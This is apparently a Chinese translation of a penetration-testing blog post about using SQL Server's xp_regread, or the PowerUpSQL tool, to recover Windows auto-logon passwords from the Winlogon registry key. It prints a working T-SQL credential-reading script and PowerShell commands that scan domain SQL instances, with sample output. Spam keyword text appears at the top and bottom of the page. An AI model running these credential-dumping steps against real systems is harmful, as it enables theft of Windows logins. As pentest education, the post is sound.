成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

專家教你如何在SQL Server中通過PowerUpSQL獲得Windows自動登錄密碼

譯文
安全 數據安全 應用安全 SQL Server
本文中,筆者將展示如何使用PowerUpSQL通過SQL Serverd導出Windows自動登錄密碼。我也來談談xp_regread存儲過程中的其他利用方式也可在滲透測試中使用。

【51CTO.com快譯】在這篇博客中,我將展示如何使用PowerUpSQL通過SQL Serverd導出Windows自動登錄密碼。我也來談談xp_regread存儲過程中的其他利用方式也可在滲透測試中使用。

[[172950]]

xp_regread簡史

從SQL Server 2000后xp_regread擴展存儲過程一直被使用,因為其原始版本允許以公共服務器角色的成員訪問SQL Server服務帳戶權限的幾乎任何東西的。當時,它有一個非常大的影響,因為SQL Server以LocalSystem權限運行是常見的(譯者注:很容易被提權)。自從SQL Server 2000 SP4發布之后,由于添加了一些訪問控制,這有助于防止低權限的登錄訪問敏感的注冊表位置,xp_regread的影響已經相當小,現在,未經授權的用戶訪問唯一的注冊表位置都與SQLServer相關。對于您可以訪問這些位置的列表https://support.microsoft.com/en-us/kb/887165

下面是更有趣的訪問路徑中的幾個:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Search
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQLServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Messaging Subsystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\SQLServer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLServer
HKEY_CURRENT_USER\Software\Microsoft\Mail HKEY_CURRENT_USER\Control Panel\International

xp_regread公共角色的實際用途

即使是我們的雙手被捆綁,xp_regread也可以用來獲取不少有用的信息。事實上,作為***權限登錄時,我經常用它來抓取其它地方無法獲取的服務器信息。例如,在PowerUpSQL中的Get-SQLServerInfo功能包括一些這些查詢:

  1. PS C:\> Get-SQLServerInfo 
  2. ComputerName           : SQLServer1 
  3. Instance               : SQLServer1 
  4. DomainName             : demo.local 
  5. ServiceName            : MSSQLSERVER 
  6. ServiceAccount         : NT Service\MSSQLSERVER 
  7. AuthenticationMode     : Windows and SQL Server Authentication 
  8. Clustered              : No 
  9. SQLServerVersionNumber : 12.0.4213.0 
  10. SQLServerMajorVersion  : 2014 
  11. SQLServerEdition       : Developer Edition (64-bit
  12. SQLServerServicePack   : SP1 
  13. OSArchitecture         : X64 
  14. OsMachineType          : WinNT 
  15. OSVersionName          : Windows 8.1 Pro 
  16. OsVersionNumber        : 6.3 
  17. Currentlogin           : demo\user 
  18. IsSysadmin             : Yes 
  19. ActiveSessions         : 3 
 

在SQL Server SP4中實現的訪問控制限制并不適用于系統管理員。其結果是,任何SQL Server服務賬戶可以在注冊表訪問,一個系統管理員可以通過xp_regread訪問。乍一看,這似乎不是什么大不了的事,但它確實讓我們從注冊表中的敏感數據,而不必使用xp_cmdshell存儲過程,啟用和使用xp_cmdshel會觸發大量的告警。所以xp_regread實際上最終被用于基本的SQL Server開發任務后。

使用xp_regread恢復Windows自動登錄憑據

配置Windows在計算機啟動時自動登錄這是可以實現的,雖然這不是在企業環境中的常見配置,這是我們在零售環境中經常看到的東西。特別是那些支持傳統的POS終端和信息亭使用SQL服務器本地運行。在大多數情況下,當Windows配置為自動登錄,加密的憑據存儲在注冊表項:

HKEY_LOCAL_MACHINE SOFTWARE \Microsoft\Windows NT\CURRENTVERSION \Winlogon

利用這些信息,我們可以編寫使用一個基本的TSQL腳本,通過xp_regread獲取注冊表的自動登錄憑據,而無需使xp_cmdshell啟用。下面就是一個TSQL腳本例子,但由于注冊表路徑不在允許列表上,我們必須作為一個系統管理員運行查詢:

  1. ------------------------------------------------------------------------- 
  2. -- Get Windows Auto Login Credentials from the Registry 
  3. ------------------------------------------------------------------------- 
  4. -- Get AutoLogin Default Domain 
  5. DECLARE @AutoLoginDomain  SYSNAME 
  6. EXECUTE master.dbo.xp_regread 
  7. @rootkey        = N'HKEY_LOCAL_MACHINE'
  8. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  9. @value_name     = N'DefaultDomainName'
  10. @value          = @AutoLoginDomain output 
  11. -- Get AutoLogin DefaultUsername 
  12. DECLARE @AutoLoginUser  SYSNAME 
  13. EXECUTE master.dbo.xp_regread 
  14. @rootkey        = N'HKEY_LOCAL_MACHINE'
  15. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  16. @value_name     = N'DefaultUserName'
  17. @value          = @AutoLoginUser output 
  18. -- Get AutoLogin DefaultUsername 
  19. DECLARE @AutoLoginPassword  SYSNAME 
  20. EXECUTE master.dbo.xp_regread 
  21. @rootkey        = N'HKEY_LOCAL_MACHINE'
  22. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  23. @value_name     = N'DefaultPassword'
  24. @value          = @AutoLoginPassword output  
  25. -- Display Results 
  26. SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword 

我已經創建了一個名為“Get-SQLRecoverPwAutoLogon”的PowerUpSQL函數,所以你可以直接運行它。它將獲取默認的Windows自動登錄信息和曾經設置過的Windows自動登錄信息。然后,它返回相關的域名、用戶名和密碼。

下面是那些感興趣的一個命令示例。如果您對滲透隱蔽的SQL Server目標有興趣,你可以挖掘這個博客(https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/):

  1. PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”} 
  2. PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose 
  3. VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success. 
  4. VERBOSE: SQLServer2.demo.local\Application : Connection Success. 
  5. VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done. 
  6. VERBOSE: SQLServer3.demo.local\2014 : Connection Success. 
  7. VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done. 
  8. ComputerName : SQLServer1 
  9. Instance     : SQLServer1\Instance1 
  10. Domain       : demo.local 
  11. UserName     : KioskAdmin 
  12. Password     : test 
  13. ComputerName : SQLServer1 
  14. Instance     : SQLServer1\Instance1 
  15. Domain       : demo.local 
  16. UserName     : kioskuser 
  17. Password     : KioskUserPassword! 

總結

即使xp_regread擴展存儲過程已部分閹割,仍有許多方式,它可以被證明是有用的滲透測試和紅隊交戰中。希望你能用“sqlserverinfo”、“sqlrecoverpwautologon”函數構建它的能力,更多注冊表的樂趣將陸續提供,在此期間,祝你好運,并負責任!

參考文章:

https://support.microsoft.com/en-us/kb/887165

https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx

http://sqlmag.com/t-sql/using-t-sql-manipulate-registry

原文標題:Get Windows Auto Login Passwords via SQL Server with PowerUpSQL      作者:Scott Sutherland

【51CTO譯稿,合作站點轉載請注明原文譯者和出處為51CTO.com】

免責聲明:本站提供文章僅供安全研究與教學之用,風險自負!

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2017-02-23 11:00:35

2012-11-12 10:48:36

2010-06-11 12:47:34

UML視圖

2010-07-14 14:30:13

2010-09-15 13:45:01

2018-07-19 05:13:38

2017-03-10 08:35:49

數字化

2009-12-30 10:41:29

ISDN撥號

2009-12-29 13:46:06

2010-07-09 10:37:00

視頻服務器DIY

2011-06-09 09:59:16

2010-08-05 09:02:49

2009-12-21 09:52:03

2015-06-04 10:43:54

OpenStack 環最小化

2010-07-14 13:56:10

SQL Server

2021-12-01 08:19:12

SQL Server 數據庫Microsoft

2011-03-18 09:48:32

2011-03-02 17:41:28

2019-11-15 16:20:35

Windows 10自動重啟Windows

2009-11-26 09:35:54

VS2003安裝包
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产99久久精品一区二区永久免费 | 免费视频一区二区 | 99热精品在线 | 久久久精品久久久 | 日韩一区二区三区在线播放 | 日韩一二区 | 在线2区| 一区二区三区四区在线视频 | 国产精品一区二区三区四区五区 | 精品一区二区观看 | 欧美黑人狂野猛交老妇 | 亚洲成人av| 人人干在线 | 亚洲成av | 伊人伊成久久人综合网站 | 成人激情视频在线观看 | 成年人国产在线观看 | 国产成人免费视频网站高清观看视频 | 成年人在线播放 | a在线视频观看 | 免费一级欧美在线观看视频 | 国产一区成人 | 日韩免费激情视频 | 午夜久久| 日干夜操| 一二三四av | 欧洲精品一区 | 成人在线h | 色吧综合 | 欧美精品1区2区3区 精品国产欧美一区二区 | 精品国产欧美一区二区 | 国产精品久久久久久久久久软件 | 一区二区在线 | 久久国产精品-国产精品 | 九九导航 | 9porny九色视频自拍 | 91亚洲精品国偷拍自产在线观看 | 天天弄 | 午夜成人免费视频 | 亚州中文字幕 | 日本中出视频 |